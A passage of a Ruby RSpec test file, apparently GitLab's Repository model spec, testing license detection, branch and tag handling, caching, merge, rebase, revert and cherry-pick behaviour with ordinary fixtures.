expect(repository.license_blob).to be_nil
end
it 'detects license file with no recognizable open-source license content' do
repository.create_file(user, 'LICENSE', 'Copyright!',
message: 'Add LICENSE', branch_name: 'master')
expect(repository.license_blob.path).to eq('LICENSE')
end
%w[LICENSE LICENCE LiCensE LICENSE.md LICENSE.foo COPYING COPYING.md].each do |filename|
it "detects '#{filename}'" do
repository.create_file(user, filename,
Licensee::License.new('mit').content,
message: "Add #{filename}", branch_name: 'master')
expect(repository.license_blob.name).to eq(filename)
end
end
end
describe '#license_key', :use_clean_rails_memory_store_caching do
before do
repository.delete_file(user, 'LICENSE',
message: 'Remove LICENSE', branch_name: 'master')
end
it 'returns nil when no license is detected' do
expect(repository.license_key).to be_nil
end
it 'returns nil when the repository does not exist' do
expect(repository).to receive(:exists?).and_return(false)
expect(repository.license_key).to be_nil
end
it 'returns nil when the content is not recognizable' do
repository.create_file(user, 'LICENSE', 'Gitlab B.V.',
message: 'Add LICENSE', branch_name: 'master')
expect(repository.license_key).to be_nil
end
it 'returns nil when the commit SHA does not exist' do
allow(repository.head_commit).to receive(:sha).and_return('1' * 40)
expect(repository.license_key).to be_nil
end
it 'returns nil when master does not exist' do
repository.rm_branch(user, 'master')
expect(repository.license_key).to be_nil
end
it 'returns the license key' do
repository.create_file(user, 'LICENSE',
Licensee::License.new('mit').content,
message: 'Add LICENSE', branch_name: 'master')
expect(repository.license_key).to eq('mit')
end
end
describe '#license' do
before do
repository.delete_file(user, 'LICENSE',
message: 'Remove LICENSE', branch_name: 'master')
end
it 'returns nil when no license is detected' do
expect(repository.license).to be_nil
end
it 'returns nil when the repository does not exist' do
expect(repository).to receive(:exists?).and_return(false)
expect(repository.license).to be_nil
end
it 'returns nil when the content is not recognizable' do
repository.create_file(user, 'LICENSE', 'Gitlab B.V.',
message: 'Add LICENSE', branch_name: 'master')
expect(repository.license).to be_nil
end
it 'returns the license' do
license = Licensee::License.new('mit')
repository.create_file(user, 'LICENSE',
license.content,
message: 'Add LICENSE', branch_name: 'master')
expect(repository.license).to eq(license)
end
end
describe "#gitlab_ci_yml", :use_clean_rails_memory_store_caching do
it 'returns valid file' do
files = [TestBlob.new('file'), TestBlob.new('.gitlab-ci.yml'), TestBlob.new('copying')]
expect(repository.tree).to receive(:blobs).and_return(files)
expect(repository.gitlab_ci_yml.path).to eq('.gitlab-ci.yml')
end
it 'returns nil if not exists' do
expect(repository.tree).to receive(:blobs).and_return([])
expect(repository.gitlab_ci_yml).to be_nil
end
it 'returns nil for empty repository' do
allow(repository).to receive(:root_ref).and_raise(Gitlab::Git::Repository::NoRepository)
expect(repository.gitlab_ci_yml).to be_nil
end
end
describe '#ambiguous_ref?' do
let(:ref) { 'ref' }
subject { repository.ambiguous_ref?(ref) }
context 'when ref is ambiguous' do
before do
repository.add_tag(project.creator, ref, 'master')
repository.add_branch(project.creator, ref, 'master')
end
it 'is true' do
is_expected.to eq(true)
end
end
context 'when ref is not ambiguous' do
before do
repository.add_tag(project.creator, ref, 'master')
end
it 'is false' do
is_expected.to eq(false)
end
end
end
describe '#expand_ref' do
let(:ref) { 'ref' }
subject { repository.expand_ref(ref) }
context 'when ref is not tag or branch name' do
let(:ref) { 'refs/heads/master' }
it 'returns nil' do
is_expected.to be_nil
end
end
context 'when ref is tag name' do
before do
repository.add_tag(project.creator, ref, 'master')
end
it 'returns the tag ref' do
is_expected.to eq("refs/tags/#{ref}")
end
end
context 'when ref is branch name' do
before do
repository.add_branch(project.creator, ref, 'master')
end
it 'returns the branch ref' do
is_expected.to eq("refs/heads/#{ref}")
end
end
end
describe '#add_branch' do
let(:branch_name) { 'new_feature' }
let(:target) { 'master' }
subject { repository.add_branch(user, branch_name, target) }
it "calls Gitaly's OperationService" do
expect_any_instance_of(Gitlab::GitalyClient::OperationService)
.to receive(:user_create_branch).with(branch_name, user, target)
.and_return(nil)
subject
end
it 'creates_the_branch' do
expect(subject.name).to eq(branch_name)
expect(repository.find_branch(branch_name)).not_to be_nil
end
context 'with a non-existing target' do
let(:target) { 'fake-target' }
it "returns false and doesn't create the branch" do
expect(subject).to be(false)
expect(repository.find_branch(branch_name)).to be_nil
end
end
end
shared_examples 'asymmetric cached method' do |method|
context 'asymmetric caching', :use_clean_rails_memory_store_caching, :request_store do
let(:cache) { repository.send(:cache) }
let(:request_store_cache) { repository.send(:request_store_cache) }
context 'when it returns true' do
before do
expect(repository.raw_repository).to receive(method).once.and_return(true)
end
it 'caches the output in RequestStore' do
expect do
repository.send(method)
end.to change { request_store_cache.read(method) }.from(nil).to(true)
end
it 'caches the output in RepositoryCache' do
expect do
repository.send(method)
end.to change { cache.read(method) }.from(nil).to(true)
end
end
context 'when it returns false' do
before do
expect(repository.raw_repository).to receive(method).once.and_return(false)
end
it 'caches the output in RequestStore' do
expect do
repository.send(method)
end.to change { request_store_cache.read(method) }.from(nil).to(false)
end
it 'does NOT cache the output in RepositoryCache' do
expect do
repository.send(method)
end.not_to change { cache.read(method) }.from(nil)
end
end
end
end
describe '#exists?' do
it 'returns true when a repository exists' do
expect(repository.exists?).to be(true)
end
it 'returns false if no full path can be constructed' do
allow(repository).to receive(:full_path).and_return(nil)
expect(repository.exists?).to be(false)
end
context 'with broken storage', :broken_storage do
it 'raises a storage error' do
expect_to_raise_storage_error { broken_repository.exists? }
end
end
it_behaves_like 'asymmetric cached method', :exists?
end
describe '#has_visible_content?' do
it 'delegates to raw_repository when true' do
expect(repository.raw_repository).to receive(:has_visible_content?)
.and_return(true)
expect(repository.has_visible_content?).to eq(true)
end
it 'delegates to raw_repository when false' do
expect(repository.raw_repository).to receive(:has_visible_content?)
.and_return(false)
expect(repository.has_visible_content?).to eq(false)
end
it_behaves_like 'asymmetric cached method', :has_visible_content?
end
describe '#branch_exists?' do
let(:branch) { repository.root_ref }
subject { repository.branch_exists?(branch) }
it 'delegates to branch_names when the cache is empty' do
repository.expire_branches_cache
expect(repository).to receive(:branch_names).and_call_original
is_expected.to eq(true)
end
it 'uses redis set caching when the cache is filled' do
repository.branch_names # ensure the branch name cache is filled
expect(repository)
.to receive(:branch_names_include?)
.with(branch)
.and_call_original
is_expected.to eq(true)
end
end
describe '#tag_exists?' do
let(:tag) { repository.tags.first.name }
subject { repository.tag_exists?(tag) }
it 'delegates to tag_names when the cache is empty' do
repository.expire_tags_cache
expect(repository).to receive(:tag_names).and_call_original
is_expected.to eq(true)
end
it 'uses redis set caching when the cache is filled' do
repository.tag_names # ensure the tag name cache is filled
expect(repository)
.to receive(:tag_names_include?)
.with(tag)
.and_call_original
is_expected.to eq(true)
end
end
describe '#branch_names', :clean_gitlab_redis_cache do
let(:fake_branch_names) { ['foobar'] }
it 'gets cached across Repository instances' do
allow(repository.raw_repository).to receive(:branch_names).once.and_return(fake_branch_names)
expect(repository.branch_names).to match_array(fake_branch_names)
fresh_repository = Project.find(project.id).repository
expect(fresh_repository.object_id).not_to eq(repository.object_id)
expect(fresh_repository.raw_repository).not_to receive(:branch_names)
expect(fresh_repository.branch_names).to match_array(fake_branch_names)
end
end
describe '#empty?' do
let(:empty_repository) { create(:project_empty_repo).repository }
it 'returns true for an empty repository' do
expect(empty_repository).to be_empty
end
it 'returns false for a non-empty repository' do
expect(repository).not_to be_empty
end
it 'caches the output' do
expect(repository.raw_repository).to receive(:has_visible_content?).once
repository.empty?
repository.empty?
end
end
describe '#blobs_at' do
let(:empty_repository) { create(:project_empty_repo).repository }
it 'returns empty array for an empty repository' do
# rubocop:disable Style/WordArray
expect(empty_repository.blobs_at(['master', 'foobar'])).to eq([])
# rubocop:enable Style/WordArray
end
it 'returns blob array for a non-empty repository' do
repository.create_file(User.last, 'foobar', 'CONTENT', message: 'message', branch_name: 'master')
# rubocop:disable Style/WordArray
blobs = repository.blobs_at([['master', 'foobar']])
# rubocop:enable Style/WordArray
expect(blobs.first.name).to eq('foobar')
expect(blobs.size).to eq(1)
end
end
describe '#root_ref' do
it 'returns a branch name' do
expect(repository.root_ref).to be_an_instance_of(String)
end
it 'caches the output' do
expect(repository.raw_repository).to receive(:root_ref)
.once
.and_return('master')
repository.root_ref
repository.root_ref
end
it 'returns nil if the repository does not exist' do
repository = create(:project).repository
expect(repository).not_to be_exists
expect(repository.root_ref).to be_nil
end
it_behaves_like 'asymmetric cached method', :root_ref
end
describe '#expire_root_ref_cache' do
it 'expires the root reference cache' do
repository.root_ref
expect(repository.raw_repository).to receive(:root_ref)
.once
.and_return('foo')
repository.expire_root_ref_cache
expect(repository.root_ref).to eq('foo')
end
end
describe '#expire_branch_cache' do
# This method is private but we need it for testing purposes. Sadly there's
# no other proper way of testing caching operations.
let(:cache) { repository.send(:cache) }
it 'expires the cache for all branches' do
expect(cache).to receive(:expire)
.at_least(repository.branches.length * 2)
.times
repository.expire_branch_cache
end
it 'expires the cache for all branches when the root branch is given' do
expect(cache).to receive(:expire)
.at_least(repository.branches.length * 2)
.times
repository.expire_branch_cache(repository.root_ref)
end
it 'expires the cache for a specific branch' do
expect(cache).to receive(:expire).twice
repository.expire_branch_cache('foo')
end
end
describe '#expire_emptiness_caches' do
let(:cache) { repository.send(:cache) }
it 'expires the caches for an empty repository' do
allow(repository).to receive(:empty?).and_return(true)
expect(cache).to receive(:expire).with(:has_visible_content?)
repository.expire_emptiness_caches
end
it 'does not expire the cache for a non-empty repository' do
allow(repository).to receive(:empty?).and_return(false)
expect(cache).not_to receive(:expire).with(:has_visible_content?)
repository.expire_emptiness_caches
end
it 'expires the memoized repository cache' do
allow(repository.raw_repository).to receive(:expire_has_local_branches_cache).and_call_original
repository.expire_emptiness_caches
end
end
describe 'skip_merges option' do
subject { repository.commits(Gitlab::Git::BRANCH_REF_PREFIX + "'test'", limit: 100, skip_merges: true).map { |k| k.id } }
it { is_expected.not_to include('e56497bb5f03a90a51293fc6d516788730953899') }
end
describe '#merge' do
let(:merge_request) { create(:merge_request, source_branch: 'feature', target_branch: 'master', source_project: project) }
let(:message) { 'Test \r\n\r\n message' }
it 'merges the code and returns the commit id' do
expect(merge_commit).to be_present
expect(repository.blob_at(merge_commit.id, 'files/ruby/feature.rb')).to be_present
end
it 'sets the `in_progress_merge_commit_sha` flag for the given merge request' do
merge_commit_id = merge(repository, user, merge_request, message)
expect(merge_request.in_progress_merge_commit_sha).to eq(merge_commit_id)
end
it 'removes carriage returns from commit message' do
merge_commit_id = merge(repository, user, merge_request, message)
expect(repository.commit(merge_commit_id).message).to eq(message.delete("\r"))
end
def merge(repository, user, merge_request, message)
repository.merge(user, merge_request.diff_head_sha, merge_request, message)
end
end
describe '#merge_to_ref' do
let(:merge_request) do
create(:merge_request, source_branch: 'feature',
target_branch: 'master',
source_project: project)
end
it 'writes merge of source SHA and first parent ref to MR merge_ref_path' do
merge_commit_id = repository.merge_to_ref(user,
merge_request.diff_head_sha,
merge_request,
merge_request.merge_ref_path,
'Custom message',
merge_request.target_branch_ref)
merge_commit = repository.commit(merge_commit_id)
expect(merge_commit.message).to eq('Custom message')
expect(merge_commit.author_name).to eq(user.name)
expect(merge_commit.author_email).to eq(user.commit_email)
expect(repository.blob_at(merge_commit.id, 'files/ruby/feature.rb')).to be_present
end
end
describe '#ff_merge' do
before do
repository.add_branch(user, 'ff-target', 'feature~5')
end
it 'merges the code and return the commit id' do
merge_request = create(:merge_request, source_branch: 'feature', target_branch: 'ff-target', source_project: project)
merge_commit_id = repository.ff_merge(user,
merge_request.diff_head_sha,
merge_request.target_branch,
merge_request: merge_request)
merge_commit = repository.commit(merge_commit_id)
expect(merge_commit).to be_present
expect(repository.blob_at(merge_commit.id, 'files/ruby/feature.rb')).to be_present
end
it 'sets the `in_progress_merge_commit_sha` flag for the given merge request' do
merge_request = create(:merge_request, source_branch: 'feature', target_branch: 'ff-target', source_project: project)
merge_commit_id = repository.ff_merge(user,
merge_request.diff_head_sha,
merge_request.target_branch,
merge_request: merge_request)
expect(merge_request.in_progress_merge_commit_sha).to eq(merge_commit_id)
end
end
describe '#rebase' do
let(:merge_request) { create(:merge_request, source_branch: 'feature', target_branch: 'master', source_project: project) }
shared_examples_for 'a method that can rebase successfully' do
it 'returns the rebase commit sha' do
rebase_commit_sha = repository.rebase(user, merge_request)
head_sha = merge_request.source_project.repository.commit(merge_request.source_branch).sha
expect(rebase_commit_sha).to eq(head_sha)
end
it 'sets the `rebase_commit_sha` for the given merge request' do
rebase_commit_sha = repository.rebase(user, merge_request)
expect(rebase_commit_sha).not_to be_nil
expect(merge_request.rebase_commit_sha).to eq(rebase_commit_sha)
end
end
it_behaves_like 'a method that can rebase successfully'
it 'executes the new Gitaly RPC' do
expect_any_instance_of(Gitlab::GitalyClient::OperationService).to receive(:rebase)
repository.rebase(user, merge_request)
end
describe 'rolling back the `rebase_commit_sha`' do
let(:new_sha) { Digest::SHA1.hexdigest('foo') }
it 'does not rollback when there are no errors' do
second_response = double(pre_receive_error: nil, git_error: nil)
mock_gitaly(second_response)
repository.rebase(user, merge_request)
expect(merge_request.reload.rebase_commit_sha).to eq(new_sha)
end
it 'does rollback when a PreReceiveError is encountered in the second step' do
second_response = double(pre_receive_error: 'my_error', git_error: nil)
mock_gitaly(second_response)
expect do
repository.rebase(user, merge_request)
end.to raise_error(Gitlab::Git::PreReceiveError)
expect(merge_request.reload.rebase_commit_sha).to be_nil
end
it 'does rollback when a GitError is encountered in the second step' do
second_response = double(pre_receive_error: nil, git_error: 'git error')
mock_gitaly(second_response)
expect do
repository.rebase(user, merge_request)
end.to raise_error(Gitlab::Git::Repository::GitError)
expect(merge_request.reload.rebase_commit_sha).to be_nil
end
def mock_gitaly(second_response)
responses = [
double(rebase_sha: new_sha).as_null_object,
second_response
]
expect_any_instance_of(
Gitaly::OperationService::Stub
).to receive(:user_rebase_confirmable).and_return(responses.each)
end
end
end
describe '#revert' do
let(:new_image_commit) { repository.commit('33f3729a45c02fc67d00adb1b8bca394b0e761d9') }
let(:update_image_commit) { repository.commit('2f63565e7aac07bcdadb654e253078b727143ec4') }
let(:message) { 'revert message' }
context 'when there is a conflict' do
it 'raises an error' do
expect { repository.revert(user, new_image_commit, 'master', message) }.to raise_error(Gitlab::Git::Repository::CreateTreeError)
end
end
context 'when commit was already reverted' do
it 'raises an error' do
repository.revert(user, update_image_commit, 'master', message)
expect { repository.revert(user, update_image_commit, 'master', message) }.to raise_error(Gitlab::Git::Repository::CreateTreeError)
end
end
context 'when commit can be reverted' do
it 'reverts the changes' do
expect(repository.revert(user, update_image_commit, 'master', message)).to be_truthy
end
end
context 'reverting a merge commit' do
it 'reverts the changes' do
merge_commit
expect(repository.blob_at_branch('master', 'files/ruby/feature.rb')).to be_present
repository.revert(user, merge_commit, 'master', message)
expect(repository.blob_at_branch('master', 'files/ruby/feature.rb')).not_to be_present
end
end
end
describe '#cherry_pick' do
let(:conflict_commit) { repository.commit('c642fe9b8b9f28f9225d7ea953fe14e74748d53b') }
let(:pickable_commit) { repository.commit('7d3b0f7cff5f37573aea97cebfd5692ea1689924') }
let(:pickable_merge) { repository.commit('e56497bb5f03a90a51293fc6d516788730953899') }
let(:message) { 'cherry-pick message' }
context 'when there is a conflict' do
it 'raises an error' do
expect { repository.cherry_pick(user, conflict_commit, 'master', message) }.to raise_error(Gitlab::Git::Repository::CreateTreeError)
end
end
context 'when commit was already cherry-picked' do
it 'raises an error' do
repository.cherry_pick(user, pickable_commit, 'master', message)
expect { repository.cherry_pick(user, pickable_commit, 'master', message) }.to raise_error(Gitlab::Git::Repository::CreateTreeError)
end
end
context 'when commit can be cherry-picked' do
it 'cherry-picks the changes' do
expect(repository.cherry_pick(user, pickable_commit, 'master', message)).to be_truthy
end
end
context 'cherry-picking a merge commit' do
it 'cherry-picks the changes' do
expect(repository.blob_at_branch('improve/awesome', 'foo/bar/.gitkeep')).to be_nil
cherry_pick_commit_sha = repository.cherry_pick(user, pickable_merge, 'improve/awesome', message)
cherry_pick_commit_message = project.commit(cherry_pick_commit_sha).message
expect(repository.blob_at_branch('improve/awesome', 'foo/bar/.gitkeep')).not_to be_nil
expect(cherry_pick_commit_message).to eq(message)
end
end
end
describe '#before_delete' do
describe 'when a repository does not exist' do
before do
allow(repository).to receive(:exists?).and_return(false)
end
it 'does not flush caches that depend on repository data' do
expect(repository).not_to receive(:expire_cache)
repository.before_delete
end
it 'flushes the tags cache' do
expect(repository).to receive(:expire_tags_cache)
repository.before_delete
end
it 'flushes the branches cache' do
expect(repository).to receive(:expire_branches_cache)
repository.before_delete
end
it 'flushes the root ref cache' do
expect(repository).to receive(:expire_root_ref_cache)
repository.before_delete
end
it 'flushes the emptiness caches' do
expect(repository).to receive(:expire_emptiness_caches)
repository.before_delete
end
it 'flushes the exists cache' do
expect(repository).to receive(:expire_exists_cache).twice
repository.before_delete
end
end
describe 'when a repository exists' do
before do
allow(repository).to receive(:exists?).and_return(true)
end
it 'flushes the tags cache' do
expect(repository).to receive(:expire_tags_cache)
repository.before_delete
end
it 'flushes the branches cache' do
expect(repository).to receive(:expire_branches_cache)
repository.before_delete
end
it 'flushes the root ref cache' do
expect(repository).to receive(:expire_root_ref_cache)
repository.before_delete
end
it 'flushes the emptiness caches' do
expect(repository).to receive(:expire_emptiness_caches)
repository.before_delete
end
end
end
describe '#before_change_head' do
it 'flushes the branch cache' do
expect(repository).to receive(:expire_branch_cache)
repository.before_change_head
end
it 'flushes the root ref cache' do
expect(repository).to receive(:expire_root_ref_cache)
repository.before_change_head
end
end
describe '#after_change_head' do
it 'flushes the method caches' do
expect(repository).to receive(:expire_method_caches).with([
:size,
:commit_count,
:rendered_readme,
:readme_path,
:contribution_guide,
:changelog,
:license_blob,
:license_key,
:gitignore,
:gitlab_ci_yml,
:branch_names,
:tag_names,
:branch_count,
:tag_count,
:avatar,
:exists?,
:root_ref,
:merged_branch_names,
:has_visible_content?,
:issue_template_names,
:merge_request_template_names,
:metrics_dashboard_paths,
:xcode_project?
])
repository.after_change_head
end
end
describe '#expires_caches_for_tags' do
it 'flushes the cache' do
expect(repository).to receive(:expire_statistics_caches)
expect(repository).to receive(:expire_emptiness_caches)
expect(repository).to receive(:expire_tags_cache)
repository.expire_caches_for_tags
end
end
describe '#before_push_tag' do
it 'logs an event' do
expect(repository).not_to receive(:expire_statistics_caches)
expect(repository).not_to receive(:expire_emptiness_caches)
expect(repository).not_to receive(:expire_tags_cache)
expect(repository).to receive(:repository_event).with(:push_tag)
repository.before_push_tag
end
end
describe '#after_push_commit' do
it 'expires statistics caches' do
expect(repository).to receive(:expire_statistics_caches)
.and_call_original
expect(repository).to receive(:expire_branch_cache)
.with('master')
.and_call_original
repository.after_push_commit('master')
end
end
describe '#after_create_branch' do
it 'expires the branch caches' do
expect(repository).to receive(:expire_branches_cache)
repository.after_create_branch
end
it 'does not expire the branch caches when specified' do
expect(repository).not_to receive(:expire_branches_cache)
repository.after_create_branch(expire_cache: false)
end
end
describe '#after_remove_branch' do
it 'expires the branch caches' do
expect(repository).to receive(:expire_branches_cache)
repository.after_remove_branch
end
it 'does not expire the branch caches when specified' do
expect(repository).not_to receive(:expire_branches_cache)
repository.after_remove_branch(expire_cache: false)
end
end
describe '#after_create' do
it 'calls expire_status_cache' do
expect(repository).to receive(:expire_status_cache)
repository.after_create
end
it 'logs an event' do
expect(repository).to receive(:repository_event).with(:create_repository)
repository.after_create
end
end
describe '#expire_status_cache' do
it 'flushes the exists cache' do
expect(repository).to receive(:expire_exists_cache)
repository.expire_status_cache
end
it 'flushes the root ref cache' do
expect(repository).to receive(:expire_root_ref_cache)
repository.expire_status_cache
end
it 'flushes the emptiness caches' do
expect(repository).to receive(:expire_emptiness_caches)
repository.expire_status_cache
end
end
describe "#copy_gitattributes" do
it 'returns true with a valid ref' do
expect(repository.copy_gitattributes('master')).to be_truthy
end
it 'returns false with an invalid ref' do
expect(repository.copy_gitattributes('invalid')).to be_falsey
end
end
describe '#before_remove_tag' do
it 'flushes the tag cache' do
expect(repository).to receive(:expire_tags_cache).and_call_original
expect(repository).to receive(:expire_statistics_caches).and_call_original
repository.before_remove_tag
end
end
describe '#branch_count' do
it 'returns the number of branches' do
expect(repository.branch_count).to be_an(Integer)
rugged_count = rugged_repo(repository).branches.count
expect(repository.branch_count).to eq(rugged_count)
end
end
describe '#tag_count' do
it 'returns the number of tags' do
expect(repository.tag_count).to be_an(Integer)
rugged_count = rugged_repo(repository).tags.count
expect(repository.tag_count).to eq(rugged_count)
end
end
describe '#expire_branches_cache' do
it 'expires the cache' do
expect(repository).to receive(:expire_method_caches)
.with(%i(branch_names merged_branch_names branch_count has_visible_content?))
.and_call_original
repository.expire_branches_cache
end
end
describe '#expire_tags_cache' do
it 'expires the cache' do
expect(repository).to receive(:expire_method_caches)
.with(%i(tag_names tag_count))
.and_call_original
repository.expire_tags_cache
end
end
describe '#add_tag' do
let(:user) { build_stubbed(:user) }
context 'with a valid target' do
it 'creates the tag' do
repository.add_tag(user, '8.5', 'master', 'foo')
tag = repository.find_tag('8.5')
expect(tag).to be_present
expect(tag.message).to eq('foo')
expect(tag.dereferenced_target.id).to eq(repository.commit('master').id)
end
it 'returns a Gitlab::Git::Tag object' do
tag = repository.add_tag(user, '8.5', 'master', 'foo')
expect(tag).to be_a(Gitlab::Git::Tag)
end
end
context 'with an invalid target' do
it 'returns false' do
expect(repository.add_tag(user, '8.5', 'bar', 'foo')).to be false
end
end
end
describe '#rm_branch' do
it 'removes a branch' do
expect(repository).to receive(:before_remove_branch)
expect(repository).to receive(:after_remove_branch)
repository.rm_branch(user, 'feature')
end
context 'when pre hooks failed' do
before do
allow_any_instance_of(Gitlab::GitalyClient::OperationService)
.to receive(:user_delete_branch).and_raise(Gitlab::Git::PreReceiveError)
end
it 'gets an error and does not delete the branch' do
expect do
repository.rm_branch(user, 'feature')
end.to raise_error(Gitlab::Git::PreReceiveError)
expect(repository.find_branch('feature')).not_to be_nil
end
end
end
describe '#rm_tag' do
it 'removes a tag' do
expect(repository).to receive(:before_remove_tag)
repository.rm_tag(build_stubbed(:user), 'v1.1.0')
expect(repository.find_tag('v1.1.0')).to be_nil
end
end
describe '#avatar' do
it 'returns nil if repo does not exist' do
allow(repository).to receive(:root_ref).and_raise(Gitlab::Git::Repository::NoRepository)
expect(repository.avatar).to be_nil
end
it 'returns the first avatar file found in the repository' do
expect(repository).to receive(:file_on_head)
.with(:avatar)
.and_return(double(:tree, path: 'logo.png'))
expect(repository.avatar).to eq('logo.png')
end
it 'caches the output' do
expect(repository).to receive(:file_on_head)
.with(:avatar)
.once
.and_return(double(:tree, path: 'logo.png'))
2.times { expect(repository.avatar).to eq('logo.png') }
end
end
describe '#expire_exists_cache' do
let(:cache) { repository.send(:cache) }
let(:request_store_cache) { repository.send(:request_store_cache) }
it 'expires the cache' do
expect(cache).to receive(:expire).with(:exists?)
repository.expire_exists_cache
end
it 'expires the request store cache', :request_store do
expect(request_store_cache).to receive(:expire).with(:exists?)
repository.expire_exists_cache
end
end
describe '#xcode_project?' do
before do
allow(repository).to receive(:tree).with(:head).and_return(double(:tree, trees: [tree]))
end
context 'when the root contains a *.xcodeproj directory' do
let(:tree) { double(:tree, path: 'Foo.xcodeproj') }
it 'returns true' do
expect(repository.xcode_project?).to be_truthy
end
end
context 'when the root contains a *.xcworkspace directory' do
let(:tree) { double(:tree, path: 'Foo.xcworkspace') }
it 'returns true' do
expect(repository.xcode_project?).to be_truthy
end
end
context 'when the root contains no Xcode config directory' do
let(:tree) { double(:tree, path: 'Foo') }
it 'returns false' do
expect(repository.xcode_project?).to be_falsey
end
end
end
describe '#contribution_guide', :use_clean_rails_memory_store_caching do
it 'returns and caches the output' do
expect(repository).to receive(:file_on_head)
.with(:contributing)
.and_return(Gitlab::Git::Tree.new(path: 'CONTRIBUTING.md'))
.once
2.times do
expect(repository.contribution_guide)
.to be_an_instance_of(Gitlab::Git::Tree)
end
end
end
describe '#gitignore', :use_clean_rails_memory_store_caching do
it 'returns and caches the output' do
expect(repository).to receive(:file_on_head)
.with(:gitignore)
.and_return(Gitlab::Git::Tree.new(path: '.gitignore'))
.once
2.times do
expect(repository.gitignore).to be_an_instance_of(Gitlab::Git::Tree)
end
end
end
describe '#readme', :use_clean_rails_memory_store_caching do
context 'with a non-existing repository' do
let(:project) { create(:project) }
it 'returns nil' do
expect(repository.readme).to be_nil
end
end
context 'with an existing repository' do
context 'when no README exists' do
let(:project) { create(:project, :empty_repo) }
it 'returns nil' do
expect(repository.readme).to be_nil
end
end
context 'when a README exists' do
let(:project) { create(:project, :repository) }
it 'returns the README' do
expect(repository.readme).to be_an_instance_of(ReadmeBlob)
end
end
end
end
describe '#readme_path', :use_clean_rails_memory_store_caching do
context 'with a non-existing repository' do
let(:project) { create(:project) }
it 'returns nil' do
expect(repository.readme_path).to be_nil
end
end
context 'with an existing repository' do
context 'when no README exists' do
let(:project) { create(:project, :empty_repo) }
it 'returns nil' do
expect(repository.readme_path).to be_nil
end
end
context 'when a README exists' do
let(:project) { create(:project, :repository) }
it 'returns the README' do
expect(repository.readme_path).to eq("README.md")
end
it 'caches the response' do
expect(repository).to receive(:readme).and_call_original.once
2.times do
expect(repository.readme_path).to eq("README.md")
end
end
end
end
end
describe '#expire_statistics_caches' do
it 'expires the caches' do
expect(repository).to receive(:expire_method_caches)
.with(%i(size commit_count))
repository.expire_statistics_caches
end
end
describe '#expire_all_method_caches' do
it 'expires the caches of all methods' do
expect(repository).to receive(:expire_method_caches)
.with(Repository::CACHED_METHODS)
repository.expire_all_method_caches
end
it 'all cache_method definitions are in the lists of method caches' do
methods = repository.methods.map do |method|
match = /^_uncached_(.*)/.match(method)
match[1].to_sym if match
end.compact
expect(Repository::CACHED_METHODS + Repository::MEMOIZED_CACHED_METHODS).to include(*methods)
end
end
describe '#file_on_head' do
context 'with a non-existing repository' do
it 'returns nil' do
expect(repository).to receive(:tree).with(:head).and_return(nil)
expect(repository.file_on_head(:readme)).to be_nil
end
end
context 'with a repository that has no blobs' do
it 'returns nil' do
expect_any_instance_of(Tree).to receive(:blobs).and_return([])
expect(repository.file_on_head(:readme)).to be_nil
end
end
context 'with an existing repository' do
it 'returns a Gitlab::Git::Tree' do
expect(repository.file_on_head(:readme))
.to be_an_instance_of(Gitlab::Git::Tree)
end
end
end
describe '#head_tree' do
context 'with an existing repository' do
it 'returns a Tree' do
expect(repository.head_tree).to be_an_instance_of(Tree)
end
end
context 'with a non-existing repository' do
it 'returns nil' do
expect(repository).to receive(:head_commit).and_return(nil)
expect(repository.head_tree).to be_nil
end
end
end
shared_examples '#tree' do
context 'using a non-existing repository' do
before do
allow(repository).to receive(:head_commit).and_return(nil)
end
it 'returns nil' do
expect(repository.tree(:head)).to be_nil
end
it 'returns nil when using a path' do
expect(repository.tree(:head, 'README.md')).to be_nil
end
end
context 'using an existing repository' do
it 'returns a Tree' do
expect(repository.tree(:head)).to be_an_instance_of(Tree)
expect(repository.tree('v1.1.1')).to be_an_instance_of(Tree)
end
end
end
it_behaves_like '#tree'
describe '#tree? with Rugged enabled', :enable_rugged do
it_behaves_like '#tree'
end
describe '#size' do
context 'with a non-existing repository' do
it 'returns 0' do
expect(repository).to receive(:exists?).and_return(false)
expect(repository.size).to eq(0.0)
end
end
context 'with an existing repository' do
it 'returns the repository size as a Float' do
expect(repository.size).to be_an_instance_of(Float)
end
end
end
describe '#local_branches' do
it 'returns the local branches' do
masterrev = repository.find_branch('master').dereferenced_target
create_remote_branch('joe', 'remote_branch', masterrev)
repository.add_branch(user, 'local_branch', masterrev.id)
expect(repository.local_branches.any? { |branch| branch.name == 'remote_branch' }).to eq(false)
expect(repository.local_branches.any? { |branch| branch.name == 'local_branch' }).to eq(true)
end
end
describe '#commit_count' do
context 'with a non-existing repository' do
it 'returns 0' do
expect(repository).to receive(:root_ref).and_return(nil)
expect(repository.commit_count).to eq(0)
end
end
context 'with an existing repository' do
it 'returns the commit count' do
expect(repository.commit_count).to be_an(Integer)
end
end
end
describe '#commit_count_for_ref' do
let(:project) { create :project }
context 'with a non-existing repository' do
it 'returns 0' do
expect(project.repository.commit_count_for_ref('master')).to eq(0)
end
end
context 'with empty repository' do
it 'returns 0' do
project.create_repository
expect(project.repository.commit_count_for_ref('master')).to eq(0)
end
end
context 'when searching for the root ref' do
it 'returns the same count as #commit_count' do
expect(repository.commit_count_for_ref(repository.root_ref)).to eq(repository.commit_count)
end
end
end
describe '#refresh_method_caches' do
it 'refreshes the caches of the given types' do
expect(repository).to receive(:expire_method_caches)
.with(%i(rendered_readme readme_path license_blob license_key license))
expect(repository).to receive(:rendered_readme)
expect(repository).to receive(:readme_path)
expect(repository).to receive(:license_blob)
expect(repository).to receive(:license_key)
expect(repository).to receive(:license)
repository.refresh_method_caches(%i(readme license))
end
end
describe '#gitlab_ci_yml_for' do
before do
repository.create_file(User.last, '.gitlab-ci.yml', 'CONTENT', message: 'Add .gitlab-ci.yml', branch_name: 'master')
end
context 'when there is a .gitlab-ci.yml at the commit' do
it 'returns the content' do
expect(repository.gitlab_ci_yml_for(repository.commit.sha)).to eq('CONTENT')
end
end
context 'when there is no .gitlab-ci.yml at the commit' do
it 'returns nil' do
expect(repository.gitlab_ci_yml_for(repository.commit.parent.sha)).to be_nil
end
end
end
describe '#route_map_for' do
before do
repository.create_file(User.last, '.gitlab/route-map.yml', 'CONTENT', message: 'Add .gitlab/route-map.yml', branch_name: 'master')
end
context 'when there is a .gitlab/route-map.yml at the commit' do
it 'returns the content' do
expect(repository.route_map_for(repository.commit.sha)).to eq('CONTENT')
end
end
context 'when there is no .gitlab/route-map.yml at the commit' do
it 'returns nil' do
expect(repository.route_map_for(repository.commit.parent.sha)).to be_nil
end
end
end
def create_remote_branch(remote_name, branch_name, target)
rugged = rugged_repo(repository)
rugged.references.create("refs/remotes/#{remote_name}/#{branch_name}", target.id)
end
